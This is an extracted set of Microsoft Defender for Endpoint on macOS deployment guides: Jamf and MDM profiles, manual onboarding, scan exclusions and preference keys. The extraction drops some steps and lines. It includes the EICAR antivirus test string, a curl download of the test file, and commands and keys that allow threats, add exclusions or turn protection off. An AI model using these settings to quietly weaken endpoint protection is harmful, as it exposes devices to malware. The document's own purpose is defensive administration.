1. In the Jamf Pro dashboard, select Configuration Profiles.
2. Select + New.
Name: MDATP MDAV - grant Full Disk Access to EDR and AV

Description: On macOS 11 (Big Sur) or later, the new Privacy Preferences
Policy Control
Category: None
Distribution method: Install Automatically
Level: Computer level

4. In Configure Privacy Preferences Policy Control select Configure.
5. In Privacy Preferences Policy Control, enter the following details:
Identifier: com.microsoft.wdav
Identifier Type: Bundle ID
Code Requirement: identifier "com.microsoft.wdav" and anchor apple
generic and certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */
and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and
certificate leaf[subject.OU] = UBF8T346G9


6. Select + Add.
Under App or service: Set to SystemPolicyAllFiles
Under "access": Set to Allow
7. Select Save (not the one at the bottom right).


8. Click the + sign next to App Access to add a new entry.
9. Enter the following details:
Identifier: com.microsoft.wdav.epsext
Identifier Type: Bundle ID
Code Requirement: identifier "com.microsoft.wdav.epsext" and anchor
apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] /* exists
*/ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and
certificate leaf[subject.OU] = UBF8T346G9
10. Select + Add.


Under App or service: Set to SystemPolicyAllFiles
Under "access": Set to Allow
11. Select Save (not the one at the bottom right).


13. Select + Add.
14. Select Computer Groups > under Group Name > select Contoso's MachineGroup.

15. Select Add.
16. Select Save.
17. Select Done.


Alternatively, you can download fulldisk.mobileconfig and upload it to JAMF

Configuration Profiles as described in Deploying Custom Configuration Profiles using
Jamf Pro|Method 2: Upload a Configuration Profile to Jamf Pro .
Step 7: Approve System extensions for

1. In the Configuration Profiles, select + New.
Name: MDATP MDAV System Extensions

Description: MDATP system extensions
Category: None
Distribution Method: Install Automatically
Level: Computer Level
3. In System Extensions select Configure.
4. In System Extensions, enter the following details:
Display Name: Microsoft Corp. System Extensions

System Extension Types: Allowed System Extensions
Team Identifier: UBF8T346G9
Allowed System Extensions:
com.microsoft.wdav.epsext
com.microsoft.wdav.netext

6. Select + Add.
7. Select Computer Groups > under Group Name > select Contoso's Machine
Group.
8. Select + Add.

9. Select Save.
10. Select Done.


Step 8: Configure Network Extension

Defender portal. The following policy allows the network extension to perform this
functionality.
These steps are applicable on macOS 11 (Big Sur) or later.
1. In the Jamf Pro dashboard, select Computers, then Configuration Profiles.
2. Click New, and enter the following details for Options:
Tab General:
Name: Microsoft Defender Network Extension
Description: macOS 11 (Big Sur) or later
Tab Content Filter:

Filter Name: Microsoft Defender Content Filter
Identifier: com.microsoft.wdav
Leave Service Address, Organization, User Name, Password, Certificate
blank (Include is not selected)
Filter Order: Inspector
Socket Filter: com.microsoft.wdav.netext
Socket Filter Designated Requirement: identifier
"com.microsoft.wdav.netext" and anchor apple generic and certificate
1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate

leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate
leaf[subject.OU] = UBF8T346G9
Leave Network Filter fields blank (Include is not selected)
Note that Identifier, Socket Filter and Socket Filter Designated Requirement
exact values as specified above.


4. Select + Add.
5. Select Computer Groups > under Group Name > select Contoso's Machine
Group.
6. Select + Add.
7. Select Save.

8. Select Done.
Alternatively, you can download netfilter.mobileconfig and upload it to JAMF

Configuration Profiles as described in Deploying Custom Configuration Profiles using
Jamf Pro|Method 2: Upload a Configuration Profile to Jamf Pro .
Step 9: Configure Background Services
Ｕ Caution
macOS 13 (Ventura) contains new privacy enhancements. Beginning with this

version, by default, applications cannot run in background without explicit consent.
Microsoft Defender for Endpoint must run its daemon process in background.
This configuration profile grants Background Service permissions to Microsoft
Defender for Endpoint. If you previously configured Microsoft Defender for
Endpoint through JAMF, we recommend you update the deployment with this
configuration profile.
Download background_services.mobileconfig from our GitHub repository .
Upload downloaded mobileconfig to JAMF Configuration Profiles as described in

Deploying Custom Configuration Profiles using Jamf Pro|Method 2: Upload a
Configuration Profile to Jamf Pro .
Step 10: Schedule scans with Microsoft

Defender for Endpoint on macOS
Follow the instructions on Schedule scans with Microsoft Defender for Endpoint on
macOS.
Step 11: Deploy Microsoft Defender for

Endpoint on macOS
７ Note
In the steps that follow, the name of the .pkg file and the Display Name values are
examples. In these examples, 200329 represents the date on which the package and
policy were created (in yymmdd format), and v100.86.92 represents the version of
the Microsoft Defender application that is being deployed. These values should be
updated to conform with the naming convention you use in your environment for
Packages and Policies.
1. Navigate to where you saved wdav.pkg .
2. Rename it to wdav_MDM_Contoso_200329.pkg .

3. Open the Jamf Pro dashboard.
4. Select your computer and click the gear icon at the top, then select Computer
Management.

5. In Packages, select + New.
6. In the General tab, enter the following details in New Package:
Display Name: Leave it blank for now. Because it will be reset when you
choose your pkg.
Filename: Choose File
Open the file and point it to wdav.pkg or wdav_MDM_Contoso_200329.pkg .

7. Select Open. Set the Display Name to Microsoft Defender Advanced Threat
Protection and Microsoft Defender Antivirus.
Manifest File is not required. Microsoft Defender for Endpoint works without
Manifest File.
Options tab: Keep default values.
Limitations tab: Keep default values.
8. Select Save. The package is uploaded to Jamf Pro.
It can take a few minutes for the package to be available for deployment.

9. Navigate to the Policies page.
10. Select + New to create a new policy.


11. In General, enter the Display name MDATP Onboarding Contoso 200329
v100.86.92 or later.
12. Select Recurring Check-in.


13. Select Save.
14. Select Packages > Configure.
15. Select the Add button next to Microsoft Defender Advanced Threat Protection
and Microsoft Defender Antivirus.

16. Select Save.
17. Create a smart group for machines with Microsoft Defender profiles.
For better user experience, configuration profiles to enrolled machines must be

installed before Microsoft Defender's package. In most cases JAMF Prof pushes
configuration profiles immediately, which policies are executed after some time
(i.e. during check-in).
However, in some cases, configuration profiles deployment can be deployed with a

significant delay (i.e. if a user's machine is locked).
JAMF Pro provides a way to ensure the correct order. You can create a smart group
for machines that already received Microsoft Defender's configuration profile, and
install Microsoft Defender's package only to those machines (and as soon as they
receive this profile!)
To do it, create a smart group first. In the new browser window open Smart
Computers Groups from the left menu, click New. Assign some name, switch to
the Criteria tab, click Add and Show Advanced Criteria.
Select Profile Name as a criterion, and use the name of a previously created
configuration profile as Value:
Click Save. Return back to the window where you configure a package policy.
19. Select the target computers.


Under Scope, select Add.
Switch to the Computer Groups tab. Find the smart group you created, and Add it.

Select Self-Service, if you want users to install Microsoft Defender voluntarily, on
demand.
20. Select Done.
Configuration profile scope

JAMF requires you to define a set of machines for a configuration profile. You need to
make sure that all machines receiving Defender's package, also receive all configuration
profiles listed above.
２ Warning
JAMF supports Smart Computer Groups that allow deploying, such as configuration
profiles or policies to all machines matching certain criteria evaluated dynamically.
It is a powerful concept that is widely used for configuration profiles distribution.
However, keep in mind that these criteria should not include presence of Defender
on a machine. While using this criterion may sound logical, it creates problems that
are difficult to diagnose.
Defender relies on all these profiles at the moment of its installation. Making
configuration profiles depending on Defender's presence effectively delays
deployment of configuration profiles, and results in an initially unhealthy product
and/or prompts for manual approval of certian application permissions, that are
otherwise auto approved by profiles.
Deploying a policy with Microsoft Defender's package after deploying configuration

profiles ensures the end user's best experience, because all required configurations will
be applied before the package installs.
 Tip
Feedback

Enroll Microsoft Defender for Endpoint
on macOS devices into Jamf Pro
Article • 07/18/2023
Applies to:

Enroll macOS devices

There are multiple methods of getting enrolled to JamF.
This article will guide you on two methods:
Method 1: Enrollment Invitations

Method 2: Prestage Enrollments
For a complete list, see About Computer Enrollment .
Enrollment Method 1: Enrollment Invitations

1. In the Jamf Pro dashboard, navigate to Enrollment invitations.

2. Select + New.
3. In Specify Recipients for the Invitation > under Email Addresses enter the e-mail
address(es) of the recipients.
For example: janedoe@contoso.com


4. Configure the message for the invitation.



Enrollment Method 2: Prestage Enrollments
1. In the Jamf Pro dashboard, navigate to Prestage enrollments.
2. Follow the instructions in Computer PreStage Enrollments .
Enroll macOS device

1. Select Continue and install the CA certificate from a System Preferences window.
2. Once CA certificate is installed, return to the browser window and select Continue
and install the MDM profile.

3. Select Allow to downloads from JAMF.
4. Select Continue to proceed with the MDM Profile installation.


5. Select Continue to install the MDM Profile.
6. Select Continue to complete the configuration.


 Tip
Feedback

Deployment with a different Mobile
Device Management (MDM) system for
macOS
Article • 11/15/2023
Applies to:


version.
Approach
Ｕ Caution
Currently, Microsoft officially supports only Intune and JAMF for the deployment
and management of Microsoft Defender for Endpoint on macOS. Microsoft makes
no warranties, express or implied, with respect to the information provided below.
If your organization uses a Mobile Device Management (MDM) solution that isn't
officially supported, this doesn't mean you're unable to deploy or run Microsoft
Microsoft Defender for Endpoint on macOS doesn't depend on any vendor-specific

features. It can be used with any MDM solution that supports the following features:
Deploy a macOS .pkg to managed devices.

Deploy macOS system configuration profiles to managed devices.
Run an arbitrary admin-configured tool/script on managed devices.
Most modern MDM solutions include these features, however, they may call them
differently.
You can deploy Defender for Endpoint without the last requirement from the preceding
list, however:
You won't be able to collect status in a centralized way.

If you decide to uninstall Defender for Endpoint, you'll need to log on to the client
device locally as an administrator.
Deployment
Most MDM solutions use the same model for managing macOS devices, with similar
terminology. Use JAMF-based deployment as a template.
Package
Configure deployment of a required application package, with the installation package
(wdav.pkg) downloaded from Microsoft Defender portal.
２ Warning

In order to deploy the package to your enterprise, use the instructions associated with
your MDM solution.
License settings
Set up a system configuration profile.
Your MDM solution may call it something like "Custom Settings Profile", as Microsoft
Defender for Endpoint on macOS isn't part of macOS.
Use the property list, jamf/WindowsDefenderATPOnboarding.plist, which can be

extracted from an onboarding package downloaded from Microsoft Defender portal.
Your system may support an arbitrary property list in XML format. You can upload the
jamf/WindowsDefenderATPOnboarding.plist file as-is in that case. Alternatively, it may
require you to convert the property list to a different format first.
Typically, your custom profile has an ID, name, or domain attribute. You must use exactly
"com.microsoft.wdav.atp" for this value. MDM uses it to deploy the settings file to
/Library/Managed Preferences/com.microsoft.wdav.atp.plist on a client device, and
Defender for Endpoint uses this file for loading the onboarding information.
System configuration profiles

macOS requires that a user manually and explicitly approves certain functions that an
application uses, for example system extensions, running in background, sending
notifications, full disk access etc. Microsoft Defender for Endpoint relies on these
functions, and can't properly function until all these consents are received from a user.
To grant consent automatically on a user's behalf, an administrator pushes system

policies through their MDM system. This is what we strongly recommend doing, instead
of relying on manual approvals from end users.
We supply all policies that Microsoft Defender for Endpoint requires as mobileconfig
files available at https://github.com/microsoft/mdatp-xplat . Mobileconfig is an
Apple's import/export format that Apple Configurator or other products like iMazing
Profile Editor support.
Most MDM vendors support importing a mobileconfig file, creating a new custom
To set up profiles:
1. Find out how a mobileconfig import is done with your MDM vendor.
2. For all profiles from https://github.com/microsoft/mdatp-xplat , download a
mobileconfig file and import it.
3. Assign proper scope for each created configuration profile.
Note that Apple regularly creates new types of payloads with new versions of OS. You'll
have to visit the above mentioned page, and publish new profiles once they became
available. We post notifications to our What's New page once we make changes like
that.
Check installation status

Run Microsoft Defender for Endpoint on a client device to check the onboarding status.
 Tip
Feedback

Manual deployment for Microsoft
Article • 12/15/2023
Applies to:

Want to experience Defender for Endpoint? Sign up for a free trial .
This article describes how to deploy Microsoft Defender for Endpoint on macOS
manually. A successful deployment requires the completion of all of the following steps:
Download installation and onboarding packages

Application installation (macOS 11 and newer versions)
Onboarding Package
Grant Full Disk Access
Ensure Background Execution

version.
Download installation and onboarding

packages
Download the installation and onboarding packages from Microsoft Defender portal.
２ Warning

1. In Microsoft Defender portal , go to Settings > Endpoints > Device
2. In Section 1 of the page, set operating system to macOS and Deployment method
to Local script.
3. In Section 2 of the page, select Download installation package. Save it as

wdav.pkg to a local directory.
4. In Section 2 of the page, select Download onboarding package. Save it as

WindowsDefenderATPOnboardingPackage.zip to the same directory.
5. From a command prompt, verify that you have the two files.
Type cd Downloads and press Enter.

Type ls and press Enter.
6. Copy the wdav.pkg and MicrosoftDefenderATPOnboardingMacOs.sh to the device

where you want to deploy the Microsoft Defender for Endpoint on macOS.
Application installation (macOS 11 and newer

versions)
To complete this process, you must have admin privileges on the device.
1. Do one of the following steps:
Navigate to the downloaded wdav.pkg in Finder and open it.
Or
You can download the wdav.pkg- from Terminal

Console
sudo installer -store -pkg /Users/admin/Downloads/wdav.pkg -target

/
2. Select Continue.
3. Read through the Software License Agreement and select Continue to agree with
the terms.
4. Read through the End-User License Agreement (EULA) and select Agree.
5. From Destination Select, select the disk where you want to install the Microsoft
Defender Software, for example, Macintosh HD and select Continue.
７ Note
The amount of disk space required for installation is around 777 MB.
6. To change the installation destination, select Change Install Location....

7. Click Install.
8. Enter the password, when prompted.
9. Click Install Software.
10. At the end of the installation process, for macOS Big Sur (11.0) or latest version,
you're prompted to approve the system extensions used by the product. Select
Open Security Preferences.
11. To enable system extention, select Details.
12. From the Security & Privacy window, select the checkboxes next to Microsoft
Defender and select OK.
13. Repeat steps 11 and 12 for all system extensions distributed with Microsoft
Defender for Endpoint on Mac.
14. As part of the Endpoint Detection and Response capabilities, Microsoft Defender
for Endpoint on Mac inspects socket traffic and reports this information to the
Microsoft Defender portal. When prompted to grant Microsoft Defender for
Endpoint permissions to filter network traffic, select Allow.
To troubleshoot System Extension issues, refer Troubleshoot System Extension.

Allow Full Disk Access
The macOS Catalina (10.15) and newer versions require full disk access to be granted to
Microsoft Defender for Endpoint in order to be able to protect and monitor.
７ Note
Full disk access grant to Microsoft Defender for Endpoint is a new requirement for
all the third-party software by Apple for files and folders containing personal data.
To grant full disk access:
1. Open System Preferences > Security & Privacy > Privacy > Full Disk Access. Click
the lock icon to make changes (bottom of the dialog box).
2. Grant Full Disk Access permission to Microsoft Defender and Microsoft

Defenders Endpoint Security Extension.
3. Select General > Restart for the new system extensions to take effect.
4. Enable Potentially Unwanted Application (PUA) in block mode.
To enable PUA, refer configure PUA protection.
5. Enable Network Protection.
To enable Network protection, refer manual deployment.
6. Enable Device Control.
To enable Device Control, refer device control for macOS.
7. Enable Tamper Protection in block mode.
To enable Tamper Protection, refer Protect MacOS security settings with tamper
protection.
8. If you have the Microsoft Purview – Endpoint data loss prevention license, you can
review Get started with Microsoft Purview - Endpoint data loss prevention.
Background execution
Starting with macOS 13, a user must explicitly allow an application to run in background.
macOS will pop a prompt up, telling the user that Microsoft Defender can run in
background.
You can view applications permitted to run in background in System Settings => Login
Items => Allow in the Background at any time:
Make sure all Microsoft Defender and Microsoft Corporation items are enabled. If they
are disabled then macOS will not start Microsoft Defender after a machine restart.
Onboarding Package
Once you have installed the MDE on macOS client, you must now onboard the package,
which registers to your Microsoft Defender for Endpoint tenant and licenses it.
1. Verify if MDE on macOS has already been onboarded.
Copy wdav.pkg and MicrosoftDefenderATPOnboardingMacOs.sh to the device where

you have deployed Microsoft Defender for Endpoint on macOS.
The client device isn't associated with org_id. The org_id attribute is blank.
Bash
mdatp health --field org_id
2. Run the Bash script to install the onboarding package:
Bash
sudo bash -x MicrosoftDefenderATPOnboardingMacOs.sh
3. Verify that the device is now associated with your organization and reports a valid
org ID:
Bash
After installation, you'll see the Microsoft Defender icon in the macOS status bar in
the top-right corner.
You can troubleshoot license issues for Microsoft Defender for Endpoint on
macOS.
4. Run the connectivity test.
Bash

You can troubleshoot cloud connectivity issues for Microsoft Defender for Endpoint on
macOS.
Verifying anti-malware detection

See the following article to test for anti-malware detection review: Antivirus detection
test to verify device onboarding and reporting services
Verifying EDR detection

See the following article to test for an EDR detection review: EDR detection test to verify
device onboarding and reporting services.

For more information on how to find the automatically generated log that's created by
the installer, see Logging installation issues.
For information on troubleshooting procedures, see:
Troubleshoot system extension issues in Microsoft Defender for Endpoint on

macOS
Troubleshoot installation issues for Microsoft Defender for Endpoint on macOS
Troubleshoot license issues for Microsoft Defender for Endpoint on macOS
macOS
Troubleshoot performance issues for Microsoft Defender for Endpoint on macOS
Uninstallation
See Uninstalling for details on how to remove Microsoft Defender for Endpoint on
macOS from client devices.
 Tip
Do you want to learn more? Engage with the Microsoft Security community in
our Tech Community: Microsoft Defender for Endpoint Tech Community .
If you have any feedback that you will like to share, submit it by opening
Microsoft Defender Endpoint on Mac on your device and navigate to Help >
Send feedback.
Recommended content
Learn how to install, configure, update, and use Microsoft Defender for Endpoint
on Mac.
Learn how to set up the Microsoft Defender for Endpoint on macOS policies in
Jamf.
Learn how to deploy Microsoft Defender for Endpoint on macOS with Jamf Pro.
Learn how to troubleshoot license issues in Microsoft Defender for Endpoint on
Mac.
Learn how to use resources for Microsoft Defender for Endpoint on Mac, including
how to uninstall it, how to collect diagnostic logs, CLI commands, and known
issues with the product.
Learn how to configure Microsoft Defender for Endpoint on Mac in enterprise
organizations.
Learn how to install Microsoft Defender for Endpoint on Mac on other
management solutions.
Learn how to detect and block Potentially Unwanted Applications (PUA) using
Microsoft Defender for Endpoint on macOS.
Feedback

Configure and validate exclusions for
macOS
Article • 05/22/2023
Applies to:

This article provides information on how to define exclusions that apply to on-demand
scans, and real-time protection and monitoring.
） Important
The exclusions described in this article don't apply to other Defender for Endpoint
on Mac capabilities, including endpoint detection and response (EDR). Files that
you exclude using the methods described in this article can still trigger EDR alerts
and other detections.
You can exclude certain files, folders, processes, and process-opened files from Defender
for Endpoint on Mac scans.
Exclusions can be useful to avoid incorrect detections on files or software that are
unique or customized to your organization. They can also be useful for mitigating
performance issues caused by Defender for Endpoint on Mac.
２ Warning
Defining exclusions lowers the protection offered by Defender for Endpoint on

Mac. You should always evaluate the risks that are associated with implementing
exclusions, and you should only exclude files that you are confident are not
malicious.
Supported exclusion types
The following table shows the exclusion types supported by Defender for Endpoint on
Mac.
ﾉ Expand table
Exclusion Definition Examples
File All files with the extension, anywhere on the machine .test
extension
File A specific file identified by the full path /var/log/test.log
/var/log/*.log
/var/log/install.?.log
Folder All files under the specified folder (recursively) /var/log/
/var/*/
Process A specific process (specified either by the full path or file /bin/cat
name) and all files opened by it
cat
c?t
File, folder, and process exclusions support the following wildcards:
ﾉ Expand table
Wildcard Description Examples
* Matches any number of any characters /var/*/tmp includes any file in

including none (note if this wildcard is /var/abc/tmp and its subdirectories, and
not used at the end of the path then it /var/def/tmp and its subdirectories. It does
will substitute only one folder) not include /var/abc/log or /var/def/log
/var/*/ includes any file in /var and its

subdirectories.
? Matches any single character file?.log includes file1.log and

file2.log , but not file123.log
７ Note
When using the * wildcard at the end of the path, it will match all files and
subdirectories under the parent of the wildcard.
７ Note
The product attempts to resolve firmlinks when evaluating exclusions. Firmlink

resolution does not work when the exclusion contains wildcards or the target file
(on the Data volume) does not exist.
How to configure the list of exclusions
From the management console

For more information on how to configure exclusions from JAMF, Intune, or another
management console, see Set preferences for Defender for Endpoint on Mac.
From the user interface

Open the Defender for Endpoint application and navigate to Manage settings > Add or
Remove Exclusion..., as shown in the following screenshot:

Select the type of exclusion that you wish to add and follow the prompts.
Validate exclusions lists with the EICAR test file

You can validate that your exclusion lists are working by using curl to download a test
file.
In the following Bash snippet, replace test.txt with a file that conforms to your
exclusion rules. For example, if you have excluded the .testing extension, replace
test.txt with test.testing . If you are testing a path, ensure that you run the command
within that path.
Bash
curl -o test.txt https://secure.eicar.org/eicar.com.txt
If Defender for Endpoint on Mac reports malware, then the rule is not working. If there is
no report of malware, and the downloaded file exists, then the exclusion is working. You
can open the file to confirm that the contents are the same as what is described on the
EICAR test file website .
If you do not have Internet access, you can create your own EICAR test file. Write the
EICAR string to a new text file with the following Bash command:
Bash
echo 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'
> test.txt
You can also copy the string into a blank text file and attempt to save it with the file
name or in the folder you are attempting to exclude.
Allow threats
In addition to excluding certain content from being scanned, you can also configure the
product not to detect some classes of threats (identified by the threat name). You
should exercise caution when using this functionality, as it can leave your device
unprotected.
To add a threat name to the allowed list, execute the following command:
Bash
mdatp threat allowed add --name [threat-name]
The threat name associated with a detection on your device can be obtained using the
following command:
Bash
mdatp threat list
For example, to add EICAR-Test-File (not a virus) (the threat name associated with
the EICAR detection) to the allowed list, execute the following command:
Bash
mdatp threat allowed add --name "EICAR-Test-File (not a virus)"
 Tip
Feedback

Set preferences for Microsoft Defender
for Endpoint on macOS
Article • 06/22/2023
Applies to:

） Important
This article contains instructions for how to set preferences for Microsoft Defender
for Endpoint on macOS in enterprise organizations. To configure Microsoft
Defender for Endpoint on macOS using the command-line interface, see Resources.
Summary
In enterprise organizations, Microsoft Defender for Endpoint on macOS can be
managed through a configuration profile that is deployed by using one of several
management tools. Preferences that are managed by your security operations team take
precedence over preferences that are set locally on the device. Changing the
preferences that are set through the configuration profile requires escalated privileges
and isn't available for users without administrative permissions.
This article describes the structure of the configuration profile, includes a recommended
profile that you can use to get started, and provides instructions on how to deploy the
profile.
Configuration profile structure

The configuration profile is a .plist file that consists of entries identified by a key (which
denotes the name of the preference), followed by a value, which depends on the nature
of the preference. Values can either be simple (such as a numerical value) or complex,
such as a nested list of preferences.
Ｕ Caution
The layout of the configuration profile depends on the management console that
you are using. The following sections contain examples of configuration profiles for
JAMF and Intune.
The top level of the configuration profile includes product-wide preferences and entries
for subareas of Microsoft Defender for Endpoint, which are explained in more detail in
the next sections.
Antivirus engine preferences

The antivirusEngine section of the configuration profile is used to manage the
preferences of the antivirus component of Microsoft Defender for Endpoint.
ﾉ Expand table
Section Value
Domain com.microsoft.wdav
Key antivirusEngine
Data type Dictionary (nested preference)
Comments See the following sections for a description of the dictionary contents.
Enforcement level for antivirus engine

Specifies the enforcement preference of antivirus engine. There are three values for
setting enforcement level:
Real-time ( real_time ): Real-time protection (scan files as they're accessed) is

enabled.
On-demand ( on_demand ): Files are scanned only on demand. In this:
Real-time protection is turned off.
Passive ( passive ): Runs the antivirus engine in passive mode. In this:
On-demand scanning is turned on.
Automatic threat remediation is turned off.
Security intelligence updates are turned on.
Status menu icon is hidden.
ﾉ Expand table
Section Value
Key enforcementLevel
Data type String
Possible values real_time (default)

on_demand
passive
Comments Available in Microsoft Defender for Endpoint version 101.10.72 or higher.
Configure file hash computation feature
Enables or disables file hash computation feature. When this feature is enabled,
Defender for Endpoint computes hashes for files it scans to enable better matching
against the indicator rules. On macOS, only the script and Mach-O (32 and 64 bit) files
are considered for this hash computation (from engine version 1.1.20000.2 or higher).
Note that enabling this feature might impact device performance. For more details,
please refer to: Create indicators for files.
ﾉ Expand table
Section Value
Key enableFileHashComputation
Data type Boolean
Possible values false (default)

true
Comments Available in Defender for Endpoint version 101.86.81 or higher.
Run a scan after definitions are updated

Specifies whether to start a process scan after new security intelligence updates are
downloaded on the device. Enabling this setting triggers an antivirus scan on the
running processes of the device.
ﾉ Expand table
Section Value
Key scanAfterDefinitionUpdate
Data type Boolean
Possible values true (default)

false
Scan archives (on-demand antivirus scans only)

Specifies whether to scan archives during on-demand antivirus scans.
ﾉ Expand table
Section Value
Key scanArchives
Data type Boolean

false
Degree of parallelism for on-demand scans

Specifies the degree of parallelism for on-demand scans. This corresponds to the
number of threads used to perform the scan and impacts the CPU usage, as well as the
duration of the on-demand scan.
ﾉ Expand table
Section Value
Key maximumOnDemandScanThreads
Data type Integer
Possible values 2 (default). Allowed values are integers between 1 and 64.
Exclusion merge policy
Specify the merge policy for exclusions. This can be a combination of administrator-
defined and user-defined exclusions ( merge ), or only administrator-defined exclusions
( admin_only ). This setting can be used to restrict local users from defining their own
exclusions.
ﾉ Expand table
Section Value
Key exclusionsMergePolicy
Data type String
Possible values merge (default)

admin_only
Scan exclusions
Specify entities excluded from being scanned. Exclusions can be specified by full paths,
extensions, or file names. (Exclusions are specified as an array of items, administrator can
specify as many elements as necessary, in any order.)
ﾉ Expand table
Section Value
Key exclusions
Type of exclusion
Specify content excluded from being scanned by type.
ﾉ Expand table
Section Value
Key $type
Data type String
Possible values excludedPath

excludedFileName
Path to excluded content
Specify content excluded from being scanned by full file path.
ﾉ Expand table
Section Value
Key path
Section Value
Data type String
Possible values valid paths
Comments Applicable only if $type is excludedPath

Mac.
ﾉ Expand table
File All files with the extension, anywhere on the device .test
extension
/var/log/*.log
/var/*/
name) and all files opened by it
cat
c?t
） Important
The paths above must be hard links, not symbolic links, in order to be successfully
excluded. You can check if a path is a symbolic link by running file <path-name> .

ﾉ Expand table
Wildcard Description Example Matches Doesn't match
* Matches any /var/\*/\*.log /var/log/system.log /var/log/nested/system.log

number of
any
characters
including
none (note
that when
this wildcard
is used
inside a path
it will
substitute
only one
folder)
? Matches any file?.log file1.log file123.log

single
character file2.log
Path type (file / directory)

Indicate if the path property refers to a file or directory.
ﾉ Expand table
Section Value
Key isDirectory
Data type Boolean

true
File extension excluded from the scan

Specify content excluded from being scanned by file extension.
ﾉ Expand table
Section Value
Key extension
Data type String
Possible values valid file extensions
Comments Applicable only if $type is excludedFileExtension
Process excluded from the scan

Specify a process for which all file activity is excluded from scanning. The process can be
specified either by its name (for example, cat ) or full path (for example, /bin/cat ).
ﾉ Expand table
Section Value
Key name
Data type String
Possible values any string
Comments Applicable only if $type is excludedFileName
Allowed threats
Specify threats by name that aren't blocked by Defender for Endpoint on Mac. These
threats will be allowed to run.
ﾉ Expand table
Section Value
Key allowedThreats
Data type Array of strings
Disallowed threat actions
Restricts the actions that the local user of a device can take when threats are detected.
The actions included in this list aren't displayed in the user interface.
ﾉ Expand table
Section Value
Key disallowedThreatActions
Possible values allow (restricts users from allowing threats)

restore (restricts users from restoring threats from the quarantine)
Threat type settings

Specify how certain threat types are handled by Microsoft Defender for Endpoint on
macOS.
ﾉ Expand table
Section Value
Key threatTypeSettings
Section Value
Threat type
Specify threat types.
ﾉ Expand table
Section Value
Key key
Data type String
Possible values potentially_unwanted_application

archive_bomb
Action to take
Specify what action to take when a threat of the type specified in the preceding section
is detected. Choose from the following options:
Audit: your device isn't protected against this type of threat, but an entry about
the threat is logged.
Block: your device is protected against this type of threat and you're notified in the
user interface and the security console.
Off: your device isn't protected against this type of threat and nothing is logged.
ﾉ Expand table
Section Value
Key value
Section Value
Data type String
Possible values audit (default)

block
off
Threat type settings merge policy

Specify the merge policy for threat type settings. This can be a combination of
administrator-defined and user-defined settings ( merge ) or only administrator-defined
settings ( admin_only ). This setting can be used to restrict local users from defining their
own settings for different threat types.
ﾉ Expand table
Section Value
Key threatTypeSettingsMergePolicy
Data type String

admin_only
Antivirus scan history retention (in days)

Specify the number of days that results are retained in the scan history on the device.
Old scan results are removed from the history. Old quarantined files that are also
removed from the disk.
ﾉ Expand table
Section Value
Section Value
Key scanResultsRetentionDays
Data type String
Possible values 90 (default). Allowed values are from 1 day to 180 days.
Maximum number of items in the antivirus scan history

Specify the maximum number of entries to keep in the scan history. Entries include all
on-demand scans performed in the past and all antivirus detections.
ﾉ Expand table
Section Value
Key scanHistoryMaximumItems
Data type String
Possible values 10000 (default). Allowed values are from 5000 items to 15000 items.
Cloud-delivered protection preferences

Configure the cloud-driven protection features of Microsoft Defender for Endpoint on
macOS.
ﾉ Expand table
Section Value
Key cloudService

Section Value
Enable / disable cloud-delivered protection

Specify whether to enable cloud-delivered protection the device or not. To improve the
security of your services, we recommend keeping this feature turned on.
ﾉ Expand table
Section Value
Key enabled
Data type Boolean

false
Diagnostic collection level

Diagnostic data is used to keep Microsoft Defender for Endpoint secure and up to date,
detect, diagnose and fix problems, and also make product improvements. This setting
determines the level of diagnostics sent by Microsoft Defender for Endpoint to
Microsoft.
ﾉ Expand table
Section Value
Key diagnosticLevel
Data type String
Possible values optional (default)

required
Configure cloud block level
This setting determines how aggressive Defender for Endpoint will be in blocking and
scanning suspicious files. If this setting is on, Defender for Endpoint will be more
aggressive when identifying suspicious files to block and scan; otherwise, it will be less
aggressive and therefore block and scan with less frequency. There are five values for
setting cloud block level:
Normal ( normal ): The default blocking level.

Moderate ( moderate ): Delivers verdict only for high confidence detections.
High ( high ): Aggressively blocks unknown files while optimizing for performance
(greater chance of blocking non-harmful files).
High Plus ( high_plus ): Aggressively blocks unknown files and applies additional
protection measures (might impact client device performance).
Zero Tolerance ( zero_tolerance ): Blocks all unknown programs.
ﾉ Expand table
Section Value
Key cloudBlockLevel
Data type String
Possible values normal (default)

moderate
high
high_plus
zero_tolerance
Enable / disable automatic sample submissions

Determines whether suspicious samples (that are likely to contain threats) are sent to
Microsoft. You're prompted if the submitted file is likely to contain personal information.
ﾉ Expand table
Section Value
Key automaticSampleSubmission
Data type Boolean

false
Enable / disable automatic security intelligence updates

Determines whether security intelligence updates are installed automatically:
ﾉ Expand table
Section Value
Key automaticDefinitionUpdateEnabled
Data type Boolean

false
User interface preferences

Manage the preferences for the user interface of Microsoft Defender for Endpoint on
macOS.
ﾉ Expand table
Section Value
Key userInterface
Show / hide status menu icon
Specify whether to show or hide the status menu icon in the top-right corner of the
screen.
ﾉ Expand table
Section Value
Key hideStatusMenuIcon
Data type Boolean

true
Show / hide option to send feedback

Specify whether users can submit feedback to Microsoft by going to Help > Send
Feedback .
ﾉ Expand table
Section Value
Key userInitiatedFeedback
Data type String
Possible values enabled (default)

disabled
Control sign-in to consumer version of Microsoft Defender
Specify whether users can sign into the consumer version of Microsoft Defender.
ﾉ Expand table
Section Value
Key consumerExperience
Data type String
Possible values enabled (default)

disabled
Endpoint detection and response preferences

Manage the preferences of the endpoint detection and response (EDR) component of
ﾉ Expand table
Section Value
Key edr
Device tags
Specify a tag name and its value.
The GROUP tag marks the device with the specified value. The tag is reflected in
the portal under the device page and can be used for filtering and grouping
devices.
ﾉ Expand table
Section Value
Key tags
Type of tag
Specifies the type of tag
ﾉ Expand table
Section Value
Key key
Data type String
Possible values GROUP
Value of tag
Specifies the value of tag
ﾉ Expand table
Section Value
Key value
Data type String

） Important
Only one value per tag type can be set.

Type of tags are unique, and should not be repeated in the same
Tamper Protection
Manage the preferences of the Tamper Protection component of Microsoft Defender for
Endpoint on macOS.
ﾉ Expand table
Section Value
Key tamperProtection
Enforcement level
If Tamper Protection is enabled and if it is in the strict mode
ﾉ Expand table
Section Value
Data type String
Comments One of 'disabled', 'audit', or 'block'
Possible values:
